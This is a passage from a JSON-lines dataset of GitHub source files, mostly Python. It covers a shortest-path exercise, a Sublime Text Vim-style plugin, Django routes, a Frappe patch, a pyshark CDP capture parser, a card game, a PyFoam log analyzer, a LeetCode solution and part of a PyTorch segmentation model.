sys.stdin.readline().split())\n\tgraph[a][b] = 1\n\tgraph[b][a] = 1\nx,k = map(int, sys.stdin.readline().split())\n\nfor i in range(1,n+1):\n\tfor j in range(1, n+1):\n\t\tif i==j :\n\t\t\tgraph[i][j] = 0\n\nfor l in range(1, n+1):\n\tfor i in range(1, n+1):\n\t\tfor j in range(1, n+1):\n\t\t\tgraph[i][j] = min(graph[i][j], graph[i][l] + graph[l][j])\n\nif(graph[1][k]==INF or graph[k][x]==INF):\n\tprint(-1)\nelse:\n\tprint(graph[1][k] + graph[k][x])\n'''\nTry to find shortest path from node 1 -> K -> X\nMust pass K: (Min cost of 1-> K) + (Min Cost of K->X)\nSolve with Floyd-Warshall.\n'''","repo_name":"arkdusdyk/Algorithms","sub_path":"thisiscodingtest/Shortest Path/미래도시.py","file_name":"미래도시.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"114014718","text":"import sublime\nimport sublime_plugin\n\n# helpers for chaning the theme\ndef _get_path_to_scheme(scheme):\n color_schemes = sublime.find_resources(\"*.sublime-color-scheme\")\n for color_scheme in color_schemes:\n if scheme in color_scheme:\n return color_scheme\n else:\n raise ValueError('No scheme matching {} found'.format(scheme))\n\ndef _set_color_scheme(scheme, settings=None):\n scheme = _get_path_to_scheme(scheme)\n _do_set_color_scheme_tmp(scheme, settings=settings)\n\ndef _do_set_color_scheme_tmp(color_scheme_path, settings):\n if settings is None:\n settings = _load_settings()\n settings.set('color_scheme', color_scheme_path)\n\ndef _load_settings():\n return sublime.load_settings('Preferences.sublime-settings')\n\n\n\nNUM_KEYS = '0123456789'\nMOVE_KEYS = 'hjklwWpPeEfF'\n## elemental movement\n# h - move left\n# j - move down\n# k - move up\n# l - move right\n\n## regions\n# p - partial word - next non [a-zA-Z0-9]\n# w - word - next white space\n# e - end - end of line\n# f - file - end of file\n\n## less defined regions\n# t - til - next \n# u - until - next inclusive\n# h - here - select word under cursor\n# H - here - select sub word under cursor\n# c - contained - bounded by - handles brackets (){}<>\n# C - Contained - bounded by inclusive\n\n# Note: caps invert unless otherwise specifed\n\nclass VimpovAction(object):\n current_action = None\n last_action = None\n def __init__(self, repeat=None, verb=None, adjective=None, noun=None):\n self.repeat = repeat\n self.verb = verb\n self.adjective = adjective\n self.noun = noun\n self.record = []\n\n def process_key(self, key):\n self.record.append(key)\n if not self.has_repeat() and not self.has_verb():\n if not self.maybe_process_repeat(key):\n self.process_verb(key)\n elif self.has_repeat() and not self.has_verb():\n if not self.maybe_process_repeat(key):\n self.process_verb(key)\n elif self.has_verb() and not self.has_adjective():\n self.process_adjective(key)\n elif self.has_adjective():\n self.process_noun(key)\n else:\n raise ValueError('We should not be here')\n return self.fully_formed()\n\n def maybe_process_repeat(self, key):\n print('maybe_process_repeat', key)\n if key not in NUM_KEYS:\n return False\n if self.repeat is None:\n self.repeat = [key]\n else:\n self.repeat += [key]\n return True\n\n def process_verb(self, key):\n print('process_verb', key)\n # g - go\n # d - delete\n # s - select\n if key in 'gds':\n self.verb = key\n elif key in MOVE_KEYS:\n self.verb = 'g'\n self.noun = key\n self.adjective = key\n else:\n raise ValueError('{} is not a valid verb'.format(key))\n\n def process_adjective(self, key):\n print('process_adjective', key)\n # TODO maybe steal from https://github.com/philippotto/Sublime-MultiEditUtils/blob/master/MultiEditUtils.py\n if key in MOVE_KEYS:#'sSwWlLfFhH':\n self.adjective = key\n self.noun = key\n elif key in 'tTuUhHcC':\n self.adjective = key\n elif key in 'd': # delete selection\n self.adjective = key\n self.noun = key\n else:\n raise ValueError('Cannot use {} as an adjective'.format(key))\n\n def process_noun(self, key):\n print('process_noun', key)\n self.noun = key\n\n def has_repeat(self):\n return self.repeat is not None\n\n def has_verb(self):\n return self.verb is not None\n\n def has_adjective(self):\n return self.adjective is not None\n\n def has_noun(self):\n return self.noun is not None\n\n def fully_formed(self):\n return self.has_verb() and self.has_noun() and self.has_adjective()\n\n def __repr__(self):\n return '{} {} {}'.format(self.verb if self.verb else '', self.adjective if self.adjective else '', self.noun if self.noun else '')\n\n def __str__(self):\n return self.__repr__()\n\n\ndef do_toggle_vimprov(view):\n settings = view.settings()\n vimprov = not settings.get('vimprov', False)\n settings.set('vimprov', vimprov)\n settings.set('command_mode', vimprov)\n VimpovAction.current_action = VimpovAction()\n VimpovAction.last_action = None\n view.set_status('_vimprov', '')\n\n if vimprov:\n stark_color_theme_loc = settings.get('vimprov_stark_them')\n if stark_color_theme_loc is None:\n stark_color_theme_loc = _get_path_to_scheme('Stark')\n settings.set('vimprov_stark_them', stark_color_theme_loc)\n\n prev_theme = settings.get('color_scheme')\n\n print(prev_theme, '~>', stark_color_theme_loc)\n\n settings.set('vimprov_prev_theme', prev_theme)\n\n _do_set_color_scheme_tmp(stark_color_theme_loc, settings)\n\n else:\n stark_color_theme_loc = settings.get('vimprov_stark_them')\n assert stark_color_theme_loc is not None\n\n prev_theme = settings.get('vimprov_prev_theme')\n assert prev_theme is not None\n\n print(stark_color_theme_loc, '~>', prev_theme)\n\n _do_set_color_scheme_tmp(prev_theme, settings)\n\n\ndef do_move(key, view, extend):\n assert key in MOVE_KEYS\n # elemental\n if key == 'h':\n view.run_command('move', {'by': 'characters', 'forward': False, 'extend': extend})\n elif key == 'j':\n view.run_command('move', {'by': 'lines', 'forward': True, 'extend': extend})\n elif key == 'k':\n view.run_command('move', {'by': 'lines', 'forward': False, 'extend': extend})\n elif key == 'l':\n view.run_command('move', {'by': 'characters', 'forward': True, 'extend': extend})\n # regions\n elif key == 'w':\n view.run_command('move', {'by': 'words', 'forward': True, 'extend': extend})\n elif key == 'W':\n view.run_command('move', {'by': 'words', 'forward': False, 'extend': extend})\n elif key == 'p':\n view.run_command('move', {'by': 'subwords', 'forward': True, 'extend': extend})\n elif key == 'P':\n view.run_command('move', {'by': 'subwords', 'forward': False, 'extend': extend})\n elif key == 'e':\n view.run_command('move_to', {'to': 'eol', 'extend': extend})\n elif key == 'E':\n view.run_command('move_to', {'to': 'bol', 'extend': extend})\n elif key == 'f':\n view.run_command('move_to', {'to': 'eof', 'extend': extend})\n elif key == 'F':\n view.run_command('move_to', {'to': 'bof', 'extend': extend})\n\n\ndef do_move_in_the_weeds(view, til, forward, extend, include_char, erase=False, edit=None):\n new_regions = []\n for sel in view.sel():\n # set side of selection based on direction\n if forward:\n row, col = view.rowcol(sel.b)\n else:\n row, col = view.rowcol(sel.a)\n # do find\n line = view.substr(view.line(view.text_point(row, 0)))\n left = line[:col]\n right = line[col:]\n if forward:\n delta = right.find(til)\n row, col = view.rowcol(sel.b)\n else:\n delta = left.rfind(til)\n delta = len(left) - delta\n row, col = view.rowcol(sel.a)\n # ensure that delta is positive\n delta = max(delta, 0)\n\n if delta == -1 or delta == 0: # handle no movement\n if extend:\n region = sublime.Region(sel.a, sel.b)\n else:\n region = sublime.Region(sel.a, sel.a)\n else: # handle movement\n if include_char and forward: # off-by-ones with include chat\n delta += 1\n if not include_char and not forward:\n delta -= 1\n\n # ensure that selection stays on line\n if forward:\n moved_row, _ = view.rowcol(sel.b+delta)\n else:\n moved_row, _ = view.rowcol(sel.a-delta)\n\n if moved_row != row:\n delta = 0\n\n # move selection\n if extend:\n if forward:\n region = sublime.Region(sel.a, sel.b+delta)\n else:\n region = sublime.Region(sel.a-delta, sel.b)\n else:\n if forward:\n region = sublime.Region(sel.a+delta, sel.a+delta)\n else:\n region = sublime.Region(sel.a-delta, sel.a-delta)\n new_regions.append(region)\n\n # clear and recreate selections\n view.sel().clear()\n for region in new_regions:\n view.sel().add(region)\n if erase:\n assert edit is not None\n delete_nonempty_selections(view, edit)\n\ndef delete_nonempty_selections(view, edit):\n for sel in view.sel():\n if not sel.empty():\n view.erase(edit, sublime.Region(sel.a, sel.b))\n\ndef transform_action(action, view, edit):\n print('transform_action', action.verb, action.adjective, action.noun)\n if action.verb == 'i':\n do_toggle_vimprov(view)\n\n def doit():\n assert action.verb in 'gsd'\n extend = action.verb in 'sd'\n forward = action.adjective in 'tu'\n include_char = action.adjective in 'tC'\n erase = action.verb == 'd'\n if action.verb == 'd' and action.adjective == 'd':\n delete_nonempty_selections(view, edit)\n\n if action.adjective in MOVE_KEYS:\n do_move(action.adjective, view, extend=extend)\n if erase:\n delete_nonempty_selections(view, edit)\n\n elif action.adjective in 'tT':\n do_move_in_the_weeds(view=view, til=action.noun, forward=forward, extend=extend, include_char=include_char, edit=edit, erase=erase)\n elif action.adjective in 'uU':\n do_move_in_the_weeds(view=view, til=action.noun, forward=forward, extend=extend, include_char=include_char, edit=edit, erase=erase)\n elif action.adjective in 'cC':\n if not extend:\n print('contained implies extend')\n if action.noun in '()':\n left_char = '('\n right_char = ')'\n elif action.noun in '<>':\n left_char = '<'\n right_char = '>'\n elif action.noun in '[]':\n left_char = '['\n right_char = ']'\n elif action.noun in '{}':\n left_char = '{'\n right_char = '}'\n else:\n left_char = right_char = action.noun\n\n do_move_in_the_weeds(view=view, til=right_char, forward=True, extend=True, include_char=include_char, edit=edit, erase=erase)\n do_move_in_the_weeds(view=view, til=left_char, forward=False, extend=True, include_char=include_char, edit=edit, erase=erase)\n else:\n print('{} is not a valid adjective'.format(action.adjective))\n\n if action.repeat is None:\n repeat = 1\n else:\n repeat = int(''.join(action.repeat))\n\n for _ in range(repeat):\n doit()\n\nimport re\n\n\ndef do_regex_forward_search(view, regex):\n new_regions = []\n for sel in view.sel():\n # set side of selection based on direction\n row, col = view.rowcol(sel.b)\n\n # do find\n line = view.substr(view.line(view.text_point(row, 0)))\n right = line[col:]\n # print(regex, right)\n match = re.search(regex, right)\n # print(match)\n if match is not None:\n a = sel.b + match.start()\n b = sel.b + match.end()\n print(a, b)\n new_regions.append(sublime.Region(a, b))\n else:\n new_regions.append(sublime.Region(sel.a, sel.b))\n\n view.sel().clear()\n for region in new_regions:\n print('***', region)\n view.sel().add(region)\n\nclass VimprovRegexSearchCommand(sublime_plugin.TextCommand):\n def run(self, edit, regex):\n do_regex_forward_search(self.view, regex)\n\nclass ProcessVimprovArg(sublime_plugin.TextCommand):\n # def __init__(self, arg):\n # sublime_plugin.TextCommand.__init__(self, arg)\n # self.regex = None\n\n\n def do_regex_search(self, regex):\n self.view.run_command(\"vimprov_regex_search\", {\"regex\": regex})\n\n def run(self, edit, key):\n view = self.view\n print('handle key', key)\n\n # special handling for insert\n if key == 'i':\n do_toggle_vimprov(view)\n return\n # special handling for repeat\n if key == '.':\n if VimpovAction.last_action is not None:\n transform_action(VimpovAction.last_action, view, edit)\n return\n # special handling for /\n if key == '/' and not VimpovAction.current_action.has_verb():\n w = self.view.window()\n w.show_input_panel(\n ':', '',\n self.do_regex_search,\n None,\n None,\n )\n return\n # TODO\n # * clear selection for verb x\n # * dd to delete selection\n # * why doesn't undo work?\n\n # # special handling for undo\n # if key == 'u':\n # view.run_command('undo')\n # return\n # # special handling for redo\n # if key == 'U':\n # view.run_command('redo')\n # return\n\n # process regular keys\n settings = view.settings()\n view.set_status('_vimprov', '--- Vimprov: ' + ''.join(VimpovAction.current_action.record) + ' ---' )\n try:\n VimpovAction.current_action.process_key(key)\n except ValueError as e:\n print('Vimprov error:', e)\n VimpovAction.current_action = VimpovAction()\n else:\n print(VimpovAction.current_action.fully_formed())\n if VimpovAction.current_action.fully_formed():\n transform_action(VimpovAction.current_action, view, edit)\n VimpovAction.last_action = VimpovAction(\n repeat=VimpovAction.current_action.repeat,\n noun=VimpovAction.current_action.noun,\n adjective=VimpovAction.current_action.adjective,\n verb=VimpovAction.current_action.verb,\n )\n VimpovAction.current_action = VimpovAction()\n\n\nclass ToggleVimprovCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n do_toggle_vimprov(self.view)\n","repo_name":"TeaUponTweed/Vimprov","sub_path":"Vimprov.py","file_name":"Vimprov.py","file_ext":"py","file_size_in_byte":14481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13579543947","text":"from django.urls import path\nfrom . import views\n\n\n\nurlpatterns=[\n path('reg/',views.reg,name='reg'),\n path('login/',views.login,name='login'),\n path('logout/',views.logout,name='logout'),\n path('book_room/',views.book, name=\"book_room\"),\n path('booking_details/',views.booking_details,name=\"booking_details\"),\n\n\n\n\n]","repo_name":"Akash740/Hotel-webapp","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16343696492","text":"import frappe\nfrom lms.lms.md import markdown_to_html\n\n\ndef execute():\n\tcourses = frappe.get_all(\"LMS Course\", fields=[\"name\", \"description\"])\n\n\tfor course in courses:\n\t\thtml = markdown_to_html(course.description)\n\t\tfrappe.db.set_value(\"LMS Course\", course.name, \"description\", html)\n\n\tfrappe.reload_doc(\"lms\", \"doctype\", \"lms_course\")\n","repo_name":"frappe/lms","sub_path":"lms/patches/v0_0/convert_course_description_to_html.py","file_name":"convert_course_description_to_html.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"67"} +{"seq_id":"24742871790","text":"#!/usr/bin/env python3\n\nimport pyshark\nimport argparse\nimport os,subprocess\n\nparser = argparse.ArgumentParser(\n description=\"CDP analyze\"\n)\n\nparser.add_argument(\n '-f',\n dest=\"FILE\",\n type=str,\n help=\"The infile\"\n)\n\nparser.add_argument(\n '-v',\n action='store_true',\n help=\"Verbose mode. Shows all attributes\"\n)\n\nargs = parser.parse_args()\n\n\ncap = pyshark.FileCapture(args.FILE, display_filter=\"cdp\")\ni = 1\n\n\n\nif args.v:\n\n for pkt in cap:\n print(\"\\033[1;34m[*]\\033[0m Paket \" + str(i) + \" :\")\n print(\"\")\n print(pkt.cdp)\n print(\"\")\n print(\"\")\n print(\"\")\n i += 1\n\nelse:\n \n for pkt in cap:\n print(\"\\033[1;34m[*]\\033[0m Paket \" + str(i) + \" :\")\n print(\"\")\n \n if \"deviceid\" in str(pkt.cdp.field_names):\n print(\"Device ID: \" + pkt.cdp.deviceid)\n \n if \"software_version\" in str(pkt.cdp.field_names):\n print(\"Software Version: \" + pkt.cdp.software_version)\n\n if \"platform\" in str(pkt.cdp.field_names):\n \t print(\"Platform: \" + pkt.cdp.platform)\n\n if \"nrgyz_ip_address\" in str(pkt.cdp.field_names):\n print(\"IP-Address: \" + pkt.cdp.nrgyz_ip_address)\n\n if \"portid\" in str(pkt.cdp.field_names):\n print(\"Port ID: \" + pkt.cdp.portid)\n\n if \"cluster_switch_mac\" in str(pkt.cdp.field_names):\n print(\"Switch MAC: \" + pkt.cdp.cluster_switch_mac)\n\n if \"cluster_management_vlan\" in str(pkt.cdp.field_names):\n print(\"Management VLAN: \" + pkt.cdp.cluster_management_vlan)\n\n if \"vtp_management_domain\" in str(pkt.cdp.field_names):\n print(\"VTP Domain: \" + pkt.cdp.vtp_management_domain)\n\n if \"native_vlan\" in str(pkt.cdp.field_names):\n print(\"Native VLAN: \" + pkt.cdp.native_vlan)\n\n if \"voice_vlan\" in str(pkt.cdp.field_names):\n print(\"VoIP VLAN: \" + pkt.cdp.voice_vlan)\n\n\n print(\"\")\n print(\"\")\n print(\"\")\n i += 1\n\n","repo_name":"SySS-Research/WireBug","sub_path":"tools/SaCLaC/cdpanalyze.py","file_name":"cdpanalyze.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"67"} +{"seq_id":"8274412323","text":"#####################################\n### WELCOME TO YOUR OOP PROJECT #####\n#####################################\n\n# For this project you will be using OOP to create a card game. This card game will\n# be the card game \"War\" for two players, you an the computer. If you don't know\n# how to play \"War\" here are the basic rules:\n#\n# The deck is divided evenly, with each player receiving 26 cards, dealt one at a time,\n# face down. Anyone may deal first. Each player places his stack of cards face down,\n# in front of him.\n#\n# The Play:\n#\n# Each player turns up a card at the same time and the player with the higher card\n# takes both cards and puts them, face down, on the bottom of his stack.\n#\n# If the cards are the same rank, it is War. Each player turns up three cards face\n# down and one card face up. The player with the higher cards takes both piles\n# (six cards). If the turned-up cards are again the same rank, each player places\n# another card face down and turns another card face up. The player with the\n# higher card takes all 10 cards, and so on.\n#\n# There are some more variations on this but we will keep it simple for now.\n# Ignore \"double\" wars\n#\n# https://en.wikipedia.org/wiki/War_(card_game)\n\nfrom random import shuffle\n\n# Two useful variables for creating Cards.\nSUITE = 'H D S C'.split()\nRANKS = '2 3 4 5 6 7 8 9 10 J Q K A'.split()\n\nclass Deck:\n \"\"\"\n This is the Deck Class. This object will create a deck of cards to initiate\n play. You can then use this Deck list of cards to split in half and give to\n the players. It will use SUITE and RANKS to create the deck. It should also\n have a method for splitting/cutting the deck in half and Shuffling the deck.\n \"\"\"\n def __init__(self):\n print(\"Stworzono nowa talię kart\")\n self.allcards = [(s,r) for s in SUITE for r in RANKS ]\n\n def shuffle(self):\n print(\"tasowanie kart\")\n shuffle(self.allcards)\n def split_in_half(self):\n return (self.allcards[:26], self.allcards[26:])\n\n\nclass Hand:\n '''\n This is the Hand class. Each player has a Hand, and can add or remove\n cards from that hand. There should be an add and remove card method here.\n '''\n def __init__(self,cards):\n self.cards = cards\n\n def __str__(self):\n return \"Posiada {} kart\".format(len(self.cards))\n\n def add(self,added_cards):\n self.cards.extend(added_cards)\n\n def remove_card(self):\n return self.cards.pop()\n\n\nclass Player:\n \"\"\"\n This is the Player class, which takes in a name and an instance of a Hand\n class object. The Payer can then play cards and check if they still have cards.\n \"\"\"\n def __init__(self,name,hand):\n self.name = name\n self.hand = hand\n\n def play_card(self):\n drawn_card = self.hand.remove_card()\n print(\"{} zagrał: {}\".format(self.name,drawn_card))\n print(\"\\n\")\n return drawn_card\n\n def remove_war_cards(self):\n war_cards = []\n if len(self.hand.cards)<3:\n return self.hand.cards\n else:\n for x in range(3):\n war_cards.append(self.hand.remove_card())\n return war_cards\n\n def nadal_ma_karty(self):\n \"\"\"\n Zwraca wartosc prawda jezeli gracz ma karty\n \"\"\"\n return len(self.hand.cards) !=0\n\n\n\n######################\n#### GAME PLAY #######\n######################\nprint(\"Welcome to War, let's begin...\")\n\n# storzyć talie i podzielic na połowę:\ntalia = Deck()\ntalia.shuffle()\npolowa1,polowa2 = talia.split_in_half()\n\n#stworz obu zawodników\ncomp = Player(\"computer\",Hand(polowa1))\n\nname =input (\"what is your name ?\")\nuser=Player(name,Hand(polowa2))\n\ntotal_rounds = 0\nwar_count = 0\n\nwhile user.nadal_ma_karty() and comp.nadal_ma_karty():\n total_rounds+=1\n print(\"Nowa runda!\")\n print(\"wynik:\")\n print(user.name +\" ma kart :\" + str(len(user.hand.cards)))\n print(comp.name +\" ma kart :\" + str(len(comp.hand.cards)))\n print(\"zagraj karte\")\n print('\\n')\n\n table_cards = []\n computer_card = comp.play_card()\n player_card = user.play_card()\n\n table_cards.append(computer_card)\n table_cards.append(player_card)\n\n if computer_card[1]== player_card[1]:\n war_count +=1\n print(\"war!\")\n\n table_cards.extend(user.remove_war_cards())\n table_cards.extend(comp.remove_war_cards())\n\n if RANKS.index(computer_card[1]) < RANKS.index(player_card[1]):\n user.hand.add(table_cards)\n else:\n comp.hand.add(table_cards)\n else:\n if RANKS.index(computer_card[1]) < RANKS.index(player_card[1]):\n user.hand.add(table_cards)\n else:\n comp.hand.add(table_cards)\n\n\n\nprint(\"game over , number of rounds: \" + str(total_rounds))\nprint(\"Wojna odbyła się \" + str(war_count) + \" razy\")\nprint(\"komputer ma karty ?\")\nprint(str(comp.nadal_ma_karty()))\nprint(\"gracz ma karty?\")\nprint(str(user.nadal_ma_karty()))","repo_name":"RobertJastrzebski/Training","sub_path":"Python/small programs/program_5-war/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285176873","text":"# ICE Revision: $Id$\n\"\"\"Check for Execution-Time information\"\"\"\n\nimport re\n\ndef executionRegexp():\n \"\"\"@Return: The regular expression that parses the execution time\n depending on the OpenFOAM-Version\"\"\"\n\n if foamVersionNumber(useConfigurationIfNoInstallation=True)>=(1,3):\n return \"^ExecutionTime = (.+) s .ClockTime = (.+) s$\"\n else:\n return \"^ExecutionTime = (.+) s$\"\n\n# from FileLineAnalyzer import FileLineAnalyzer\n# from TimeLineLineAnalyzer import TimeLineLineAnalyzer\n\nfrom .GeneralLineAnalyzer import GeneralLineAnalyzer\n\nfrom PyFoam.FoamInformation import foamVersionNumber\nfrom PyFoam.Error import warning\n\nclass GeneralExecutionLineAnalyzer(GeneralLineAnalyzer):\n \"\"\"Parses lines for the execution time\"\"\"\n\n def __init__(self,\n doTimelines=True,\n doFiles=True,\n singleFile=False,\n startTime=None,\n endTime=None):\n self.hasClock=(foamVersionNumber(useConfigurationIfNoInstallation=True)>=(1,3))\n titles=[\"cumulated\"]\n if self.hasClock:\n titles.append(\"delta\")\n\n GeneralLineAnalyzer.__init__(self,\n titles=titles,\n doTimelines=doTimelines,\n doFiles=doFiles,\n singleFile=singleFile,\n startTime=startTime,\n endTime=endTime)\n\n self.exp=re.compile(executionRegexp())\n self.registerRegexp(self.exp)\n\n self.resetFile()\n\n def resetFile(self):\n self.lastTime=0.\n self.time=0.\n if self.hasClock:\n self.lastClock=0.\n self.clock=0.\n\n self.first=True;\n self.firstTime=0.\n if self.hasClock:\n self.firstClock=0.\n\n def startAnalysis(self,match):\n try:\n self.time=float(match.group(1))\n\n # clear phase (if set) so that function objects don't append a phase name\n self.setPhase()\n\n except ValueError:\n warning(match.group(1),\"is not a valid number\")\n self.time=float(\"NaN\")\n if self.hasClock:\n try:\n self.clock=float(match.group(2))\n except ValueError:\n warning(match.group(2),\"is not a valid number\")\n self.clock=float(\"NaN\")\n\n def endAnalysis(self,match):\n self.lastTime = self.time\n if self.first:\n self.firstTime=self.time\n\n if self.hasClock:\n self.lastClock = self.clock\n if self.first:\n self.firstClock=self.clock\n\n self.first=False\n\n def addToFiles(self,match):\n self.files.write(\"executionTime\",self.parent.getTime(),(self.time,self.time-self.lastTime))\n\n if self.hasClock:\n self.files.write(\"wallClockTime\",self.parent.getTime(),(self.clock,self.clock-self.lastClock))\n\n def addToTimelines(self,match):\n self.lines.setValue(\"cpu\",self.time-self.lastTime)\n\n if self.hasClock:\n self.lines.setValue(\"clock\",self.clock-self.lastClock)\n\n def clockFirst(self):\n \"\"\"Returns the Wall-Clock-Time of the first timestep\"\"\"\n if self.hasClock:\n return self.firstClock\n else:\n return None\n\n def clockTotal(self):\n \"\"\"Returns the total Wall-Clock-Time\"\"\"\n if self.hasClock:\n return self.clock\n else:\n return None\n\n def timeFirst(self):\n \"\"\"Returns the CPU-Time of the first timestep\"\"\"\n return self.firstTime\n\n def timeTotal(self):\n \"\"\"Returns the total CPU-Time\"\"\"\n return self.time\n\n\nclass ExecutionTimeLineAnalyzer(GeneralExecutionLineAnalyzer):\n \"\"\"Parses lines for the execution time\"\"\"\n\n def __init__(self):\n GeneralExecutionLineAnalyzer.__init__(self,doTimelines=False)\n\n## self.exp=re.compile(executionRegexp())\n## self.lastTime=0.\n\n## def doAnalysis(self,line):\n## \"\"\"Writes total execution time and time needed since last\n## time-step\"\"\"\n## m=self.exp.match(line)\n## if m!=None:\n## time=float(m.group(1))\n\n## self.files.write(\"executionTime\",self.parent.getTime(),(time,time-self.lastTime))\n\n## self.lastTime = time\n\nclass TimeLineExecutionTimeLineAnalyzer(GeneralExecutionLineAnalyzer):\n \"\"\"Parses lines for the execution time\"\"\"\n\n def __init__(self):\n GeneralExecutionLineAnalyzer.__init__(self,doFiles=False)\n\n## self.hasClock=(foamVersionNumber()>=(1,3))\n\n## self.exp=re.compile(executionRegexp())\n\n## self.lastTime=0.\n## if self.hasClock:\n## self.lastClock=0.\n\n## def doAnalysis(self,line):\n## \"\"\"Writes total execution time and time needed since last\n## time-step\"\"\"\n## m=self.exp.match(line)\n## if m!=None:\n## time=float(m.group(1))\n## if self.hasClock:\n## clock=float(m.group(2))\n\n## self.lines.setValue(\"cpu\",time-self.lastTime)\n## self.lastTime = time\n\n## if self.hasClock:\n## self.lines.setValue(\"clock\",clock-self.lastClock)\n## self.lastClock = clock\n\n\n\n# Should work with Python3 and Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/LogAnalysis/ExecutionTimeLineAnalyzer.py","file_name":"ExecutionTimeLineAnalyzer.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"12615241105","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n if not height: return 0\n\n lp = 0\n rp = len(height) - 1\n res = 0\n maxL = height[lp]\n maxR = height[rp]\n\n while lp < rp:\n if maxL < maxR:\n lp += 1\n maxL = max(maxL, height[lp])\n res += maxL - height[lp]\n else:\n rp -= 1 \n maxR = max(maxR, height[rp])\n res += maxR - height[rp]\n return res\n","repo_name":"Elliott-Chong/LeetCode","sub_path":"13-Trapping Rain Water/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"70547613992","text":"# BGANet code\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch_dct as dct\n\nimport kornia.filters.sobel as sobel_filter\n\nfrom IS2D_models import load_backbone_model\n\nclass SubDecoder(nn.Module):\n def __init__(self, in_channels, num_classes, scale_factor):\n super(SubDecoder, self).__init__()\n\n self.subdecoder = nn.Sequential(\n nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=True),\n nn.Conv2d(in_channels, num_classes, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)))\n\n def forward(self, x):\n return self.subdecoder(x)\n\nclass RFB_S(nn.Module):\n def __init__(self, in_channels):\n super(RFB_S, self).__init__()\n\n self.branch1 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0)\n self.branch2 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=3, dilation=3)\n self.branch3 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=5, dilation=5)\n self.branch4 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=7, dilation=7)\n\n self.conv1x1 = nn.Sequential(\n nn.Conv2d(in_channels * 4, 1, kernel_size=1, stride=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n att_map = self.conv1x1(torch.cat([branch1, branch2, branch3, branch4], dim=1))\n\n return att_map\n\nclass RFB_C(nn.Module):\n def __init__(self, in_channels):\n super(RFB_C, self).__init__()\n\n self.branch1 = nn.Conv1d(in_channels, in_channels, kernel_size=1, stride=1, padding=0)\n self.branch2 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=3, dilation=3)\n self.branch3 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=5, dilation=5)\n self.branch4 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=7, dilation=7)\n\n self.conv = nn.Sequential(\n nn.Conv1d(in_channels * 4, in_channels, kernel_size=1, stride=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x = x.squeeze(dim=2)\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n att_map = self.conv(torch.cat([branch1, branch2, branch3, branch4], dim=1))\n\n return att_map.unsqueeze(dim=2)\n\nclass UpsampleBlock(nn.Module):\n def __init__(self, in_channels, out_channels, skip_connection_channels, group=1):\n super(UpsampleBlock, self).__init__()\n self.group = group\n self.average_channel_pooling = nn.AdaptiveAvgPool2d(1)\n self.conv1x1_channel = RFB_C(in_channels=out_channels)\n self.conv1x1_spatial = RFB_S(in_channels=1)\n\n in_group_channels = int(in_channels // self.group)\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_group_channels, 1, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)),\n nn.Sigmoid())\n\n in_channels = in_channels + skip_connection_channels\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\n nn.BatchNorm2d(out_channels), nn.ReLU())\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(out_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\n nn.BatchNorm2d(out_channels), nn.ReLU(inplace=True))\n\n self.count = 1\n\n def forward(self, x, skip_connection=None, boundary_guide=None, viz=False):\n x = F.interpolate(x, size=None, scale_factor=2, mode='bilinear', align_corners=None)\n B, C, H, W = x.size()\n\n group_att_map_list = []\n for idx in range(self.group):\n group_x = x[:, int(C // self.group) * idx:int(C // self.group) * (idx + 1)]\n group_att_map = self.conv1(group_x)\n group_att_map_list.append(group_att_map)\n group_att_map = torch.mean(torch.cat(group_att_map_list, dim=1), dim=1, keepdim=True)\n x_for = x * group_att_map + x\n x = torch.cat([x_for, skip_connection], dim=1)\n x = self.conv2(x)\n\n if boundary_guide is not None:\n B, C, _, _ = boundary_guide.size()\n boundary_channel_descriptor = self.conv1x1_channel(self.average_channel_pooling(boundary_guide))\n x += boundary_channel_descriptor\n\n boundary_spatial_descriptor = self.conv1x1_spatial(torch.mean(boundary_guide, dim=1, keepdim=True))\n x += boundary_spatial_descriptor\n x = self.conv3(x)\n\n return x\n\nclass DCTFreqUNet(nn.Module):\n def __init__(self,\n 